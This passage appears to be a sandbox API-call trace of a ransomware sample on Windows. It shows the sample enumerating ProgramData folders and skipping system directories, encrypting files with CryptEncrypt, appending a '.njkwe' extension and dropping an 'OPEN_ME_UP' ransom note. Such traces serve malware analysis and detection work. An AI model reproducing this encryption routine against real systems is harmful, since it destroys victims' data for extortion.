nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.884] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.884] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.884] GetProcessHeap () returned 0xbe0000 [0067.884] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0067.884] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.884] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0067.886] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0067.886] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0067.886] CloseHandle (hObject=0x438) returned 1 [0067.886] GetProcessHeap () returned 0xbe0000 [0067.886] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0067.886] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\stream.x64.en-us.man.dat_r00t_{3sXlE5}.njkwe") returned 130 [0067.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\en-us.16\\stream.x64.en-us.man.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\stream.x64.en-us.man.dat_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\en-us.16\\stream.x64.en-us.man.dat_r00t_{3sxle5}.njkwe")) returned 1 [0067.887] GetProcessHeap () returned 0xbe0000 [0067.887] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0067.887] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96ec13b1, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96ec13b1, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x3e87ff00, ftLastWriteTime.dwHighDateTime=0x1d0d7ef, nFileSizeHigh=0x0, nFileSizeLow=0xd77c4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x64.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0 [0067.887] FindClose (in: hFindFile=0xc1a120 | out: hFindFile=0xc1a120) returned 1 [0067.887] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0067.887] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\en-us.16\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0067.887] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0067.888] CloseHandle (hObject=0x434) returned 1 [0067.888] GetProcessHeap () returned 0xbe0000 [0067.888] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0067.888] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d43d48, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96ec13b1, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x96ec13b1, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="x-none.16", cAlternateFileName="")) returned 1 [0067.888] lstrcmpiW (lpString1="x-none.16", lpString2="Windows") returned 1 [0067.888] lstrcmpiW (lpString1="x-none.16", lpString2="$Recycle.bin") returned 1 [0067.888] lstrcmpiW (lpString1="x-none.16", lpString2="System Volume Information") returned 1 [0067.888] lstrcmpiW (lpString1="x-none.16", lpString2="Program Files") returned 1 [0067.888] lstrcmpiW (lpString1="x-none.16", lpString2="Program Files (x86)") returned 1 [0067.888] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16") returned 86 [0067.888] lstrcmpW (lpString1="x-none.16", lpString2=".") returned 1 [0067.889] lstrcmpW (lpString1="x-none.16", lpString2="..") returned 1 [0067.889] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.889] GetProcessHeap () returned 0xbe0000 [0067.889] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0067.889] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\*") returned 88 [0067.889] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d43d48, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96ec13b1, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x96ec13b1, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a3a0 [0067.890] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.890] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.890] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.890] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.890] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.890] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\.") returned 88 [0067.890] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.890] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d43d48, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96ec13b1, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x96ec13b1, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.890] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.890] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.890] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.890] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.890] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.890] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\..") returned 89 [0067.890] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.890] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.890] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96e74e13, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96e74e13, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x37142600, ftLastWriteTime.dwHighDateTime=0x1d0d7ee, nFileSizeHigh=0x0, nFileSizeLow=0x5211, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDescriptor.x-none.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0067.890] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="Windows") returned -1 [0067.890] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="$Recycle.bin") returned 1 [0067.890] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="System Volume Information") returned -1 [0067.890] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="Program Files") returned -1 [0067.890] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="Program Files (x86)") returned -1 [0067.890] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\MasterDescriptor.x-none.xml") returned 114 [0067.890] StrStrIW (lpFirst="MasterDescriptor.x-none.xml", lpSrch=".njkwe") returned 0x0 [0067.890] lstrcmpW (lpString1="MasterDescriptor.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.891] lstrcmpW (lpString1="MasterDescriptor.x-none.xml", lpString2="taridd") returned -1 [0067.891] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\MasterDescriptor.x-n", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.891] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0067.891] GetTickCount () returned 0x11515d6 [0067.891] GetTickCount () returned 0x11515d6 [0067.891] GetTickCount () returned 0x11515d6 [0067.891] GetTickCount () returned 0x11515d6 [0067.891] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0067.891] GetProcessHeap () returned 0xbe0000 [0067.892] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0067.892] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.893] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.893] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.894] GetProcessHeap () returned 0xbe0000 [0067.894] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0067.894] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.894] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0067.894] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0067.894] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0067.894] CloseHandle (hObject=0x438) returned 1 [0067.894] GetProcessHeap () returned 0xbe0000 [0067.894] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0067.894] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\MasterDescriptor.x-none.xml_r00t_{3sXlE5}.njkwe") returned 134 [0067.894] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\x-none.16\\masterdescriptor.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\MasterDescriptor.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\x-none.16\\masterdescriptor.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0067.895] GetProcessHeap () returned 0xbe0000 [0067.895] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0067.895] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96e74e13, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96e74e13, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x6035b600, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="s640.hash", cAlternateFileName="S640~1.HAS")) returned 1 [0067.895] lstrcmpiW (lpString1="s640.hash", lpString2="Windows") returned -1 [0067.895] lstrcmpiW (lpString1="s640.hash", lpString2="$Recycle.bin") returned 1 [0067.895] lstrcmpiW (lpString1="s640.hash", lpString2="System Volume Information") returned -1 [0067.895] lstrcmpiW (lpString1="s640.hash", lpString2="Program Files") returned 1 [0067.895] lstrcmpiW (lpString1="s640.hash", lpString2="Program Files (x86)") returned 1 [0067.895] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\s640.hash") returned 96 [0067.895] StrStrIW (lpFirst="s640.hash", lpSrch=".njkwe") returned 0x0 [0067.895] lstrcmpW (lpString1="s640.hash", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.895] lstrcmpW (lpString1="s640.hash", lpString2="taridd") returned -1 [0067.895] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\s640.hash", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.895] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\x-none.16\\s640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0067.896] GetTickCount () returned 0x11515d6 [0067.896] GetTickCount () returned 0x11515d6 [0067.896] GetTickCount () returned 0x11515d6 [0067.896] GetTickCount () returned 0x11515d6 [0067.897] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0067.897] GetProcessHeap () returned 0xbe0000 [0067.897] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0067.897] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x66, lpOverlapped=0x0) returned 1 [0067.898] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffff9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.898] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x66, lpOverlapped=0x0) returned 1 [0067.898] GetProcessHeap () returned 0xbe0000 [0067.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0067.898] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.898] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0067.899] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0067.899] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0067.899] CloseHandle (hObject=0x438) returned 1 [0067.899] GetProcessHeap () returned 0xbe0000 [0067.899] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0067.899] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\s640.hash_r00t_{3sXlE5}.njkwe") returned 116 [0067.899] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\x-none.16\\s640.hash"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\s640.hash_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\x-none.16\\s640.hash_r00t_{3sxle5}.njkwe")) returned 1 [0067.899] GetProcessHeap () returned 0xbe0000 [0067.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0067.899] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96e74e13, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96e74e13, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x6035b600, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x38480a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x64.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0067.899] lstrcmpiW (lpString1="stream.x64.x-none.man.dat", lpString2="Windows") returned -1 [0067.899] lstrcmpiW (lpString1="stream.x64.x-none.man.dat", lpString2="$Recycle.bin") returned 1 [0067.900] lstrcmpiW (lpString1="stream.x64.x-none.man.dat", lpString2="System Volume Information") returned -1 [0067.900] lstrcmpiW (lpString1="stream.x64.x-none.man.dat", lpString2="Program Files") returned 1 [0067.900] lstrcmpiW (lpString1="stream.x64.x-none.man.dat", lpString2="Program Files (x86)") returned 1 [0067.900] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\stream.x64.x-none.man.dat") returned 112 [0067.900] StrStrIW (lpFirst="stream.x64.x-none.man.dat", lpSrch=".njkwe") returned 0x0 [0067.900] lstrcmpW (lpString1="stream.x64.x-none.man.dat", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.900] lstrcmpW (lpString1="stream.x64.x-none.man.dat", lpString2="taridd") returned -1 [0067.900] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\stream.x64.x-none.ma", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.900] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\x-none.16\\stream.x64.x-none.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0067.900] GetTickCount () returned 0x11515d6 [0067.900] GetTickCount () returned 0x11515d6 [0067.900] GetTickCount () returned 0x11515d6 [0067.900] GetTickCount () returned 0x11515d6 [0067.900] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0067.900] GetProcessHeap () returned 0xbe0000 [0067.900] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0067.900] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.902] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.902] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.902] GetProcessHeap () returned 0xbe0000 [0067.902] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0067.902] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.902] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0067.904] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0067.904] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0067.904] CloseHandle (hObject=0x438) returned 1 [0067.904] GetProcessHeap () returned 0xbe0000 [0067.904] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 